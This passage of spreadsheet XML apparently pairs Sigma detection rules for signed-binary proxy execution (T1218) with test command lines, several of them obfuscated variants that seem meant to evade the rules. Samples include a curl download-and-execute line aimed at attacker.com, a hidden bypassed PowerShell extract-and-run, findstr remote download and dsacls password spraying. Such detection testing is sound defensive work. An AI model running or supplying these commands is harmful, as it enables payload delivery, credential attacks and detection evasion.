      <c r="I2270" s="43" t="n"/>
      <c r="J2270" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2270" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2271" ht="15.75" customHeight="1" s="42">
      <c r="A2271" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B2271" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_curl_download_exec_combo</t>
        </is>
      </c>
      <c r="C2271" s="43" t="inlineStr">
        <is>
          <t>Curl Download And Execute Combination</t>
        </is>
      </c>
      <c r="D2271" s="43" t="inlineStr">
        <is>
          <t>21dd6d38-2b18-4453-9404-a0fe4a0cc288</t>
        </is>
      </c>
      <c r="E2271" s="43" t="inlineStr">
        <is>
          <t>curl http://attacker.com/payload.exe -o payload.exe &amp; payload.exe</t>
        </is>
      </c>
      <c r="F2271" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2271" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2271" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2271" s="43" t="n"/>
      <c r="J2271" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2271" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2272" ht="15.75" customHeight="1" s="42">
      <c r="A2272" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B2272" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_curl_download_exec_combo</t>
        </is>
      </c>
      <c r="C2272" s="43" t="inlineStr">
        <is>
          <t>Curl Download And Execute Combination</t>
        </is>
      </c>
      <c r="D2272" s="43" t="inlineStr">
        <is>
          <t>21dd6d38-2b18-4453-9404-a0fe4a0cc288</t>
        </is>
      </c>
      <c r="E2272" s="43" t="inlineStr">
        <is>
          <t>curl http://attacker.com/payload.exe -o p.exe &amp; p.exe</t>
        </is>
      </c>
      <c r="F2272" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2272" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2272" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2272" s="43" t="n"/>
      <c r="J2272" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2272" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2273" ht="15.75" customHeight="1" s="42">
      <c r="A2273" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B2273" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_cmdl32_arbitrary_file_download</t>
        </is>
      </c>
      <c r="C2273" s="43" t="inlineStr">
        <is>
          <t>Potential Arbitrary File Download Via Cmdl32.EXE</t>
        </is>
      </c>
      <c r="D2273" s="43" t="inlineStr">
        <is>
          <t>f37aba28-a9e6-4045-882c-d5004043b337</t>
        </is>
      </c>
      <c r="E2273" s="43" t="inlineStr">
        <is>
          <t>cmdl32.exe "/vpn" "/lan" C:\path\to\config.txt</t>
        </is>
      </c>
      <c r="F2273" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2273" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2273" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2273" s="43" t="n"/>
      <c r="J2273" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2273" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2274" ht="15.75" customHeight="1" s="42">
      <c r="A2274" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B2274" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_cmdl32_arbitrary_file_download</t>
        </is>
      </c>
      <c r="C2274" s="43" t="inlineStr">
        <is>
          <t>Potential Arbitrary File Download Via Cmdl32.EXE</t>
        </is>
      </c>
      <c r="D2274" s="43" t="inlineStr">
        <is>
          <t>f37aba28-a9e6-4045-882c-d5004043b337</t>
        </is>
      </c>
      <c r="E2274" s="43" t="inlineStr">
        <is>
          <t>cmdl32.exe -vpn -lan C:\path\to\config.txt</t>
        </is>
      </c>
      <c r="F2274" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2274" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2274" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2274" s="43" t="n"/>
      <c r="J2274" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2274" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2275" ht="15.75" customHeight="1" s="42">
      <c r="A2275" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B2275" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_cmdl32_arbitrary_file_download</t>
        </is>
      </c>
      <c r="C2275" s="43" t="inlineStr">
        <is>
          <t>Potential Arbitrary File Download Via Cmdl32.EXE</t>
        </is>
      </c>
      <c r="D2275" s="43" t="inlineStr">
        <is>
          <t>f37aba28-a9e6-4045-882c-d5004043b337</t>
        </is>
      </c>
      <c r="E2275" s="43" t="inlineStr">
        <is>
          <t>cmdl32.exe /lan /vpn C:\path\to\config.txt</t>
        </is>
      </c>
      <c r="F2275" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2275" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2275" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2275" s="43" t="n"/>
      <c r="J2275" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2275" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2276" ht="15.75" customHeight="1" s="42">
      <c r="A2276" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B2276" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_diskshadow_script_mode_susp_ext</t>
        </is>
      </c>
      <c r="C2276" s="43" t="inlineStr">
        <is>
          <t>Diskshadow Script Mode - Uncommon Script Extension Execution</t>
        </is>
      </c>
      <c r="D2276" s="43" t="inlineStr">
        <is>
          <t>1dde5376-a648-492e-9e54-4241dd9b0c7f</t>
        </is>
      </c>
      <c r="E2276" s="43" t="inlineStr">
        <is>
          <t>diskshadow.exe -s "C:\temp\payload.txt"</t>
        </is>
      </c>
      <c r="F2276" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2276" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2276" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2276" s="43" t="n"/>
      <c r="J2276" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2276" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2277" ht="15.75" customHeight="1" s="42">
      <c r="A2277" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B2277" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_diskshadow_script_mode_susp_ext</t>
        </is>
      </c>
      <c r="C2277" s="43" t="inlineStr">
        <is>
          <t>Diskshadow Script Mode - Uncommon Script Extension Execution</t>
        </is>
      </c>
      <c r="D2277" s="43" t="inlineStr">
        <is>
          <t>1dde5376-a648-492e-9e54-4241dd9b0c7f</t>
        </is>
      </c>
      <c r="E2277" s="43" t="inlineStr">
        <is>
          <t>diskshadow.exe /s C:\temp\payload.`txt</t>
        </is>
      </c>
      <c r="F2277" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2277" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2277" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2277" s="43" t="n"/>
      <c r="J2277" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2277" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2278" ht="15.75" customHeight="1" s="42">
      <c r="A2278" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B2278" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_diskshadow_script_mode_susp_location</t>
        </is>
      </c>
      <c r="C2278" s="43" t="inlineStr">
        <is>
          <t>Diskshadow Script Mode - Execution From Potential Suspicious Location</t>
        </is>
      </c>
      <c r="D2278" s="43" t="inlineStr">
        <is>
          <t>fa1a7e52-3d02-435b-81b8-00da14dd66c1</t>
        </is>
      </c>
      <c r="E2278" s="43" t="inlineStr">
        <is>
          <t>diskshadow.exe /s C:\Users\Public\script.txt</t>
        </is>
      </c>
      <c r="F2278" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2278" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2278" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2278" s="43" t="n"/>
      <c r="J2278" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2278" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2279" ht="15.75" customHeight="1" s="42">
      <c r="A2279" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B2279" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_diskshadow_script_mode_susp_location</t>
        </is>
      </c>
      <c r="C2279" s="43" t="inlineStr">
        <is>
          <t>Diskshadow Script Mode - Execution From Potential Suspicious Location</t>
        </is>
      </c>
      <c r="D2279" s="43" t="inlineStr">
        <is>
          <t>fa1a7e52-3d02-435b-81b8-00da14dd66c1</t>
        </is>
      </c>
      <c r="E2279" s="43" t="inlineStr">
        <is>
          <t>diskshadow.exe -s C:\Users\Public\script.txt</t>
        </is>
      </c>
      <c r="F2279" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2279" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2279" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2279" s="43" t="n"/>
      <c r="J2279" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2279" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2280" ht="15.75" customHeight="1" s="42">
      <c r="A2280" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B2280" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_diskshadow_script_mode_susp_location</t>
        </is>
      </c>
      <c r="C2280" s="43" t="inlineStr">
        <is>
          <t>Diskshadow Script Mode - Execution From Potential Suspicious Location</t>
        </is>
      </c>
      <c r="D2280" s="43" t="inlineStr">
        <is>
          <t>fa1a7e52-3d02-435b-81b8-00da14dd66c1</t>
        </is>
      </c>
      <c r="E2280" s="43" t="inlineStr">
        <is>
          <t>diskshadow.exe /s "C:\Users\Public\script.txt"</t>
        </is>
      </c>
      <c r="F2280" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2280" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2280" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2280" s="43" t="n"/>
      <c r="J2280" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2280" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2281" ht="15.75" customHeight="1" s="42">
      <c r="A2281" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B2281" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_diskshadow_script_mode_susp_location</t>
        </is>
      </c>
      <c r="C2281" s="43" t="inlineStr">
        <is>
          <t>Diskshadow Script Mode - Execution From Potential Suspicious Location</t>
        </is>
      </c>
      <c r="D2281" s="43" t="inlineStr">
        <is>
          <t>fa1a7e52-3d02-435b-81b8-00da14dd66c1</t>
        </is>
      </c>
      <c r="E2281" s="43" t="inlineStr">
        <is>
          <t>set SCRIPT_PATH=C:\Users\Public\script.txt &amp;&amp; diskshadow.exe /s %SCRIPT_PATH%</t>
        </is>
      </c>
      <c r="F2281" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2281" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2281" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2281" s="43" t="n"/>
      <c r="J2281" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2281" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2282" ht="15.75" customHeight="1" s="42">
      <c r="A2282" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B2282" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_diskshadow_script_mode_susp_location</t>
        </is>
      </c>
      <c r="C2282" s="43" t="inlineStr">
        <is>
          <t>Diskshadow Script Mode - Execution From Potential Suspicious Location</t>
        </is>
      </c>
      <c r="D2282" s="43" t="inlineStr">
        <is>
          <t>fa1a7e52-3d02-435b-81b8-00da14dd66c1</t>
        </is>
      </c>
      <c r="E2282" s="43" t="inlineStr">
        <is>
          <t>diskshadow.exe /s C:\Users\Public\script.txt &amp;&amp; echo dummy</t>
        </is>
      </c>
      <c r="F2282" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2282" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2282" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2282" s="43" t="n"/>
      <c r="J2282" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2282" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2283" ht="15.75" customHeight="1" s="42">
      <c r="A2283" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B2283" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_dsacls_password_spray</t>
        </is>
      </c>
      <c r="C2283" s="43" t="inlineStr">
        <is>
          <t>Potential Password Spraying Attempt Using Dsacls.EXE</t>
        </is>
      </c>
      <c r="D2283" s="43" t="inlineStr">
        <is>
          <t>bac9fb54-2da7-44e9-988f-11e9a5edbc0c</t>
        </is>
      </c>
      <c r="E2283" s="43" t="inlineStr">
        <is>
          <t>dsacls.exe /user:admin /passwd:Password123</t>
        </is>
      </c>
      <c r="F2283" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2283" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2283" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2283" s="43" t="n"/>
      <c r="J2283" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2283" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2284" ht="15.75" customHeight="1" s="42">
      <c r="A2284" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B2284" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_dsacls_password_spray</t>
        </is>
      </c>
      <c r="C2284" s="43" t="inlineStr">
        <is>
          <t>Potential Password Spraying Attempt Using Dsacls.EXE</t>
        </is>
      </c>
      <c r="D2284" s="43" t="inlineStr">
        <is>
          <t>bac9fb54-2da7-44e9-988f-11e9a5edbc0c</t>
        </is>
      </c>
      <c r="E2284" s="43" t="inlineStr">
        <is>
          <t>dsacls.exe /user:admin "/passwd:Password123"</t>
        </is>
      </c>
      <c r="F2284" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2284" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2284" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2284" s="43" t="n"/>
      <c r="J2284" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2284" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2285" ht="15.75" customHeight="1" s="42">
      <c r="A2285" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B2285" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_dsacls_password_spray</t>
        </is>
      </c>
      <c r="C2285" s="43" t="inlineStr">
        <is>
          <t>Potential Password Spraying Attempt Using Dsacls.EXE</t>
        </is>
      </c>
      <c r="D2285" s="43" t="inlineStr">
        <is>
          <t>bac9fb54-2da7-44e9-988f-11e9a5edbc0c</t>
        </is>
      </c>
      <c r="E2285" s="43" t="inlineStr">
        <is>
          <t>set P=/passwd: &amp;&amp; dsacls.exe /user:admin %P%Password123</t>
        </is>
      </c>
      <c r="F2285" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2285" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2285" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2285" s="43" t="n"/>
      <c r="J2285" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2285" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2286" ht="15.75" customHeight="1" s="42">
      <c r="A2286" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B2286" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_dxcap_arbitrary_binary_execution</t>
        </is>
      </c>
      <c r="C2286" s="43" t="inlineStr">
        <is>
          <t>New Capture Session Launched Via DXCap.EXE</t>
        </is>
      </c>
      <c r="D2286" s="43" t="inlineStr">
        <is>
          <t>60f16a96-db70-42eb-8f76-16763e333590</t>
        </is>
      </c>
      <c r="E2286" s="43" t="inlineStr">
        <is>
          <t>DXCap.exe -c calc .exe</t>
        </is>
      </c>
      <c r="F2286" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2286" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2286" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2286" s="43" t="n"/>
      <c r="J2286" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2286" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2287" ht="15.75" customHeight="1" s="42">
      <c r="A2287" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B2287" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_dxcap_arbitrary_binary_execution</t>
        </is>
      </c>
      <c r="C2287" s="43" t="inlineStr">
        <is>
          <t>New Capture Session Launched Via DXCap.EXE</t>
        </is>
      </c>
      <c r="D2287" s="43" t="inlineStr">
        <is>
          <t>60f16a96-db70-42eb-8f76-16763e333590</t>
        </is>
      </c>
      <c r="E2287" s="43" t="inlineStr">
        <is>
          <t>DXCap.exe -c calc.exe -</t>
        </is>
      </c>
      <c r="F2287" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2287" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2287" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2287" s="43" t="n"/>
      <c r="J2287" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2287" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2288" ht="15.75" customHeight="1" s="42">
      <c r="A2288" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B2288" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_dxcap_arbitrary_binary_execution</t>
        </is>
      </c>
      <c r="C2288" s="43" t="inlineStr">
        <is>
          <t>New Capture Session Launched Via DXCap.EXE</t>
        </is>
      </c>
      <c r="D2288" s="43" t="inlineStr">
        <is>
          <t>60f16a96-db70-42eb-8f76-16763e333590</t>
        </is>
      </c>
      <c r="E2288" s="43" t="inlineStr">
        <is>
          <t>DXCap.exe -c calc.exe -v -c notepad.exe</t>
        </is>
      </c>
      <c r="F2288" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2288" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2288" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2288" s="43" t="n"/>
      <c r="J2288" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2288" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2289" ht="15.75" customHeight="1" s="42">
      <c r="A2289" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B2289" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_expand_cabinet_files</t>
        </is>
      </c>
      <c r="C2289" s="43" t="inlineStr">
        <is>
          <t>Potentially Suspicious Cabinet File Expansion</t>
        </is>
      </c>
      <c r="D2289" s="43" t="inlineStr">
        <is>
          <t>9f107a84-532c-41af-b005-8d12a607639f</t>
        </is>
      </c>
      <c r="E2289" s="43" t="inlineStr">
        <is>
          <t>expand.exe /F:* C:\Users\Public\test.cab C:\Windows\Temp\</t>
        </is>
      </c>
      <c r="F2289" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2289" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2289" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2289" s="43" t="n"/>
      <c r="J2289" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2289" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2290" ht="15.75" customHeight="1" s="42">
      <c r="A2290" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B2290" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_expand_cabinet_files</t>
        </is>
      </c>
      <c r="C2290" s="43" t="inlineStr">
        <is>
          <t>Potentially Suspicious Cabinet File Expansion</t>
        </is>
      </c>
      <c r="D2290" s="43" t="inlineStr">
        <is>
          <t>9f107a84-532c-41af-b005-8d12a607639f</t>
        </is>
      </c>
      <c r="E2290" s="43" t="inlineStr">
        <is>
          <t>expand.exe -F:* C:\Windows\Temp\test.cab C:\Users\Administrator\AppData\Local\Temp\</t>
        </is>
      </c>
      <c r="F2290" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2290" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2290" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2290" s="43" t="n"/>
      <c r="J2290" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2290" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2291" ht="15.75" customHeight="1" s="42">
      <c r="A2291" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B2291" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_expand_cabinet_files</t>
        </is>
      </c>
      <c r="C2291" s="43" t="inlineStr">
        <is>
          <t>Potentially Suspicious Cabinet File Expansion</t>
        </is>
      </c>
      <c r="D2291" s="43" t="inlineStr">
        <is>
          <t>9f107a84-532c-41af-b005-8d12a607639f</t>
        </is>
      </c>
      <c r="E2291" s="43" t="inlineStr">
        <is>
          <t>expand.exe /F:* C:\AppData\Roaming\test.cab C:\Windows\System32\</t>
        </is>
      </c>
      <c r="F2291" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2291" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2291" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2291" s="43" t="n"/>
      <c r="J2291" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2291" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2292" ht="15.75" customHeight="1" s="42">
      <c r="A2292" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B2292" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_findstr_download</t>
        </is>
      </c>
      <c r="C2292" s="43" t="inlineStr">
        <is>
          <t>Remote File Download Via Findstr.EXE</t>
        </is>
      </c>
      <c r="D2292" s="43" t="inlineStr">
        <is>
          <t>587254ee-a24b-4335-b3cd-065c0f1f4baa</t>
        </is>
      </c>
      <c r="E2292" s="43" t="inlineStr">
        <is>
          <t>findstr /v /l . "\\192.168.1.100\share\payload.txt"</t>
        </is>
      </c>
      <c r="F2292" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2292" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2292" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2292" s="43" t="n"/>
      <c r="J2292" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2292" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2293" ht="15.75" customHeight="1" s="42">
      <c r="A2293" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B2293" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_findstr_download</t>
        </is>
      </c>
      <c r="C2293" s="43" t="inlineStr">
        <is>
          <t>Remote File Download Via Findstr.EXE</t>
        </is>
      </c>
      <c r="D2293" s="43" t="inlineStr">
        <is>
          <t>587254ee-a24b-4335-b3cd-065c0f1f4baa</t>
        </is>
      </c>
      <c r="E2293" s="43" t="inlineStr">
        <is>
          <t>findstr -v -l . "\\192\.168\.1\.100\share\payload.txt"</t>
        </is>
      </c>
      <c r="F2293" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2293" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2293" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2293" s="43" t="n"/>
      <c r="J2293" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2293" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2294" ht="15.75" customHeight="1" s="42">
      <c r="A2294" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B2294" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_findstr_download</t>
        </is>
      </c>
      <c r="C2294" s="43" t="inlineStr">
        <is>
          <t>Remote File Download Via Findstr.EXE</t>
        </is>
      </c>
      <c r="D2294" s="43" t="inlineStr">
        <is>
          <t>587254ee-a24b-4335-b3cd-065c0f1f4baa</t>
        </is>
      </c>
      <c r="E2294" s="43" t="inlineStr">
        <is>
          <t>findstr -v -l . "\\192.168.1.100\share\payload.txt" | findstr .</t>
        </is>
      </c>
      <c r="F2294" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2294" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2294" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2294" s="43" t="n"/>
      <c r="J2294" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2294" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2295" ht="15.75" customHeight="1" s="42">
      <c r="A2295" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B2295" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_findstr_subfolder_search</t>
        </is>
      </c>
      <c r="C2295" s="43" t="inlineStr">
        <is>
          <t>Insensitive Subfolder Search Via Findstr.EXE</t>
        </is>
      </c>
      <c r="D2295" s="43" t="inlineStr">
        <is>
          <t>04936b66-3915-43ad-a8e5-809eadfd1141</t>
        </is>
      </c>
      <c r="E2295" s="43" t="inlineStr">
        <is>
          <t>copy findstr.exe fstr.exe &amp;&amp; fstr.exe /s /i "password" .</t>
        </is>
      </c>
      <c r="F2295" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2295" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2295" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2295" s="43" t="n"/>
      <c r="J2295" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2295" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2296" ht="15.75" customHeight="1" s="42">
      <c r="A2296" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B2296" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_zipexec</t>
        </is>
      </c>
      <c r="C2296" s="43" t="inlineStr">
        <is>
          <t>Suspicious ZipExec Execution</t>
        </is>
      </c>
      <c r="D2296" s="43" t="inlineStr">
        <is>
          <t>90dcf730-1b71-4ae7-9ffc-6fcf62bd0132</t>
        </is>
      </c>
      <c r="E2296" s="43" t="inlineStr">
        <is>
          <t>powershell -ep Bypass -w Hidden -Command {Expand-Archive -Path 'C:\Temp\payload.zip' -DestinationPath 'C:\Temp\extracted' -Force; Start-Process 'binary.exe'}</t>
        </is>
      </c>
      <c r="F2296" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2296" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2296" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2296" s="43" t="n"/>
      <c r="J2296" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2296" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2297" ht="15.75" customHeight="1" s="42">
      <c r="A2297" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B2297" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_iexpress_susp_execution</t>
        </is>
      </c>
      <c r="C2297" s="43" t="inlineStr">
        <is>
          <t>Self Extracting Package Creation Via Iexpress.EXE From Potentially Suspicious Location</t>
        </is>
      </c>
      <c r="D2297" s="43" t="inlineStr">
        <is>
          <t>b2b048b0-7857-4380-b0fb-d3f0ab820b71</t>
        </is>
      </c>
      <c r="E2297" s="43" t="inlineStr">
        <is>
          <t>iexpress.exe /n /q /m "C:\\Users\\Public\\Documents\\config.sed"</t>
        </is>
      </c>
      <c r="F2297" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2297" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2297" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2297" s="43" t="n"/>
      <c r="J2297" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2297" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2298" ht="15.75" customHeight="1" s="42">
      <c r="A2298" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B2298" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_imewbdld_download</t>
        </is>
      </c>
      <c r="C2298" s="43" t="inlineStr">
        <is>
          <t>Arbitrary File Download Via IMEWDBLD.EXE</t>
        </is>
      </c>
      <c r="D2298" s="43" t="inlineStr">
        <is>
          <t>863218bd-c7d0-4c52-80cd-0a96c09f54af</t>
        </is>
      </c>
      <c r="E2298" s="43" t="inlineStr">
        <is>
          <t>imewdbld.exe "h"tt"payload.exe"</t>
        </is>
      </c>
      <c r="F2298" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2298" s="43" t="b">
